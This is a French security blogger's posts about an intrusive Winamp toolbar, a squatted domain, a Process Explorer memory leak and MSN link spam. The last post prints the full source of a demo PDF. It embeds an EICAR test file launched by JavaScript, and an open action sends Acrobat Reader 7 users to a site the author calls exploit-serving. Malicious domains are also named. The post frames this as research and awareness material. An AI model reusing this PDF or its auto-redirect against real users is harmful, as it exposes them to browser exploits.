Blog d'un veilleur sécurité

Ancien adapte de Winamp (surtout 2.x), j'ai quelque peu laissé ce lecteur multimédia aux oubliettes avec l'arrivée des versions 3, puis très rapidement 5, notamment pour des problèmes de performances (et aussi de sécurité).

Récemment, travaillant sur la problématique d'offre de lecteur multimédia sur poste de travail, sécurisé, Winamp est revenu sur la table.

Qu'à cela ne tienne, j'ai donc couru installer la bête sur ma machine personnelle.

Passons brièvement sur l'installation, longue et surtout peu claire pour un néophyte puisqu'il est proposé :
- un téléchargement de MP3 (gratuits ?)
- l'installation d'un serveur multimédia pour rediriger la lecture de la bibliothèque sur un mobile, ou tout autre PC
- des barres d'outils...

Comme indiqué plus haut, j'avais abandonné Winamp pour des raisons de consommation excessive de ressources.
Je crains que cela ne soit encore le cas, et voici pourquoi.

Constatant des accès disques nombreux, un Firefox ultra-gourmand en mémoire (déjà qu'en temps normal, ce n'est pas la gloire...), j'ai donc lancé l'outil SysInternals ProcMon.
Le résultat est assez éloquent :



On se rend tout de suite compte que Firefox lance de nombreuses requêtes vers le registre, plus particulièrement sur les clés associées à la barre d'outils de Winamp 5 !

Ne comprenant pas la justification d'une telle activité système pour la barre d'outil, et n'ayant pas trouvé de moyen de régler ce problème dans les paramétrages, j'ai donc supprimé cette fameuse barre...
Et je n'ai même pas regardé les flux réseaux... !

Au passage, signalons tout de même que la barre d'outil change de nombreux réglages du navigateur, notamment les pages de recherche, les "accélérateurs", les pages s'affichant lorsque l'on fait une faute de frappe sur une URL, etc...
Bref, j'appelle ça de l'intrusif !!!

Je préfère de loin AIMP et VLC, que je recommande à ceux qui ne les ont pas déjà.


A bon entendeur....  

Une fois n'est pas coutume, je vais jouer l'internaute lambda :)

On m'a parlé du site http://www.geoscopie.com/  qui soit-disant est bien classé au niveau Intelligence Économique.

En allant dessus, j'ai eu quelques difficultés à comprendre de quoi il était question, et pour cause : je ne suis pas bilingue en japonais...!

Voici une pseudo-traduction (merci aux gens de Mountain View) :
http://translate.google.com/translate?prev=hp&hl=fr&js=n&u=http%3A%2F%2Fwww.geoscopie.com&sl=ja&tl=fr&history_state0=

Et le plus fort, c'est que même avec la traduction, j'ai du mal à voir le rapport.
Entre l'achat de maison en bois, les caméras de sécurité, la robe de mariée, etc... j'avoue y perdre le fil.

Et pire, quand on regarde le WhoIs de ce domaine : http://www.domaincrawler.com/domains/view/http://www.geoscopie.com/ :
- le "networksolutionsprivateregistration.com" en technical contact ne saute pas aux yeux mais presque...
- les serveurs NS "WEBSITEWELCOME.COM"  classés rouge par Netcraft... (lien pour info)

Alors vengeance ? je le croirais presque...

Moralité :ne jamais considérer que parce qu'une URL est à priori connue, on peut l'ouvrir dans son navigateur sans crainte : l'antivirus + filtrage sur URL sont indispensables !


PS : le VRAI site, lui, est toujours là, mais l'URL est : geoscopies.net   ....

Comme dit le dicton "ce sont les cordonniers qui sont souvent les plus mal chaussés"...
Et là, je trouve qu'on n'est pas loin !

Comme beaucoup dans le métier, je connais et utilise très souvent les outils SysInternals (au passage, chapeau bas pour la maîtrise technique des systèmes Windows, de leurs API et de leurs couches basses...).

Mais récemment, en voyant Process Explorer planter allègrement, j'ai commencé à me poser des questions.
Le fameux ProceXP ne voulait même plus être relancé, soit disant pour un problème d'allocation de ressources.

Voyons voir la config du poste:
- portable avec un T5500
- 4 Go de RAM
- disque SATA
- Process Explorer dernière version (fourni avec la dernière version de la suite SysInternals, en date du 15/01/09)
et ... aucune application graphique, jeu, ou autre glouton en ressources, de lancé !


Pourtant, j'ai régulièrement des avertissements du type :

N'y croyant pas réellement, je fais donc "annuler". Pourquoi Process Explorer pourrait-il occasionner une perte de données sur mon ordinateur, alors que je l'utilise justement pour surveiller ce qu'il se passe sur la machine, et ainsi... éviter tout ennui...

Et fatalement, on en vient à :(le comble !) :



Mais quand on regarde les ressources prises par Process Explorer, il se passe visiblement quelque chose (image en meilleure définition) :


Presque 550 Mo de mémoire système "virtuelle" ? C'est totalement anormal et aberrant !

Je crains donc qu'il s'agisse d'une fuite de mémoire sur l'outil Process Explorer (Microsoft ayant englouti SysInternals...), outil qui justement était connu pour déceler les fuites de mémoire...  c'est même indiqué sur leur site.

Affaire à suivre...
Je n'avais pas constaté tous ces plantages avec la version précédente de ProceXP...

Cette fois-ci je n'étais même pas en mode "grandes oreilles" quand une fenêtre intempestive a surgit sur mon bureau.

 

Précisons, la configuration est un Vista SP1, avec KIS 2009 et Pidgin pour la messagerie instantannée.

 

Voici à quoi ressemblait la fenêtre publicitaire (lien )

 

 

Un contact en mode "hors ligne" qui m'envoie un lien... étrange... (comme on dirait en anglais "sounds familiar, doesn't it?").

 

Le site en question demandait des identifiants MSN et ... les mots de passe pour se connecter à une partie à accès restreint...

 

Or le lendemain de l'affaire (23/11/08), si l'on va sur le site en question, voici ce qui apparaît :

 

Tiens donc, ces chers amis de SearchPortal... !

 

Cependant on dirait qu'il y a bien anguille sous roche puisque le domaine hopto.org est référencé comme malveillant, par exemple ici : http://www.malwaredomains.com/files/domains.txt  et parfois depuis 2005 ! (raison indiquée : "botnet")...

 

 

Affaire à suivre, j'espère avoir des captures d'écran du fameux site diffusé via MSN.

 

 

Mise à jour du 29/11/08 (20h50) :

 

Nouvelle campagne de diffusion via MSN (autre contact que précédemment). . Cette fois-ci le site est : http://tinyurl.com/578kt2

 

Voici une capture du message (lien externe) :

 

 

 

En fait, cette URL diffusée sur MSN redirige de manière transparente sur un autre domaine : http://8685858.getenjoyment.net

Il s'agit d'un site porno !  

 

Je ne ferai pas de capture d'écran ;)

Il est drôle de noter le contenu hébergé sur leur sous-domaine "www" : http://www.getenjoyment.net/
Ecrit en bon français...  S'agit-il réellement du début d'une encyclopédie technique sur Internet...?

Le lendemain, ce site n'est déjà plus accessible...
- Google Chrome renvoie sur http://host.atwebpages.com/web_hosting_needs.html
- Firefox, via OpenDNS, renvoie sur une page d'erreur : http://guide.opendns.com/?url=8685858.getenjoyment.net


A quand la suivante...

 

De récentes investigations sur les nouveaux vecteurs viraux, m'ont amené à m'interroger et me documenter sur les problématiques liées aux fichiers PDF.

Depuis longtemps, pour ne pas dire depuis le début, ce format (PDF) a été considéré comme "sûr".
En fait, il garantissait surtout une impression conforme à la mise en forme originale du document, lors de sa création.


Je tiens donc à recommander les lectures suivantes concernant les PDF :
- le blog de Didier Stevens
- cet article évoquant la course actuelle au PDF "malveillant"


Fort de ces lectures et de mes propres recherches, je vous fournis le PDF suivant :
- embarque un EICAR, généré à la demande via un bouton dans le document.
- si ouvert sur une version 7 (7.0 par exemple), le PDF provoque l'ouverture du navigateur par défaut de la machine, et l'envoie sur un site russe malveillant (qui tente d'exploiter diverses failles sur le navigateur, voire sur la machine Java selon les cas).


Attention, ce PDF est réellement dangereux si vous ne prenez pas de précauions !
Je le livre à fins de recherche, de validations d'applications de correctifs (voire de réglages sécurité) sur Acrobat Reader, ainsi que dans un but démonstratif et de sensibilisation.
Je ne peux être tenu pour responsable des éventuels dommages que subirait votre système informatique si vous ne prenez pas les précautions nécessaires lors de l'utilisation de ce PDF.



----------------------------------------------------------------------------
%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 12 0 R
 /Names << /EmbeddedFiles << /Names [(EICAR.txt) 9 0 R] >> >>
>>
endobj

2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj

3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj

4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Annots [7 0 R]
 /Resources <<
             /ProcSet [/PDF /Text]
             /Font << /F1 6 0 R >>
            >>
>>
endobj

5 0 obj
<< /Length 427 >>
stream
BT /F1 12 Tf 70 700 Td 15 TL
(CE PDF A l'AIR INNOCENT, POURTANT IL EMBARQUE 2 CHARGES VIRALES !) Tj
<58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A> '
() '
(Il suffit de cliquer a l'interieur du rectangle pour lancer la generation de EICAR.) '
() '
(Click here) '
ET

endstream
endobj

6 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj

7 0 obj
<<
 /Type /Annot
 /Subtype /Link
 /Rect [65 620 130 640]
 /Border [16 16 1]
 /A 8 0 R
>>
endobj

8 0 obj
<<
 /Type /Action
 /S /JavaScript
 /JS (this.exportDataObject({ cName: "EICAR.txt", nLaunch: 2 });)
>>
endobj

9 0 obj
<<
 /Type /Filespec
 /F (EICAR.txt)
 /EF << /F 10 0 R >>
>>
endobj

10 0 obj
<<
 /Type /#45mbeddedFile
 /Length 208
 /Filter /ASCIIHexDecode
>>
stream
58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A 58 35
34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 43 41
52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 49 56
49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 21 24
48 2B 48 2A>
endstream
>>
endobj

12 0 obj
<<
 /Type /Action
 /S /URI
 /URI (http://hancockparkschool.org)
>>
endobj


xref
0 11
0000000000 65535 f
0000000012 00000 n
0000000152 00000 n
0000000208 00000 n
0000000277 00000 n
0000000500 00000 n
0000000986 00000 n
0000001110 00000 n
0000001225 00000 n
0000001352 00000 n
0000001436 00000 n
trailer
<<
 /Size 11
 /Root 1 0 R
>>
startxref
1763
%%EOF

-------------------------------------------------------------------------------------

Détection antivirale de cette page :

J'ai été informé que cette page (mon blog) était détectée par Avira Antivir :
http://original.avira.com/fr/threats/JS_Dldr_Agent_BJZ_details.html
Alors, non, il ne s'agit pas du PDF !
La raison est que j'ai laissé en clair des liens vers des serveurs malveillants (article précédent) notamment le faux "msn analytics". Antivir annonce un script, alors qu'il n'y en a pas dans la page ! (iframe désactivées par syntaxe volontairement erronnée)
Il semble donc qu'Antivir se base sur une simple détection d'URL dans du texte simple...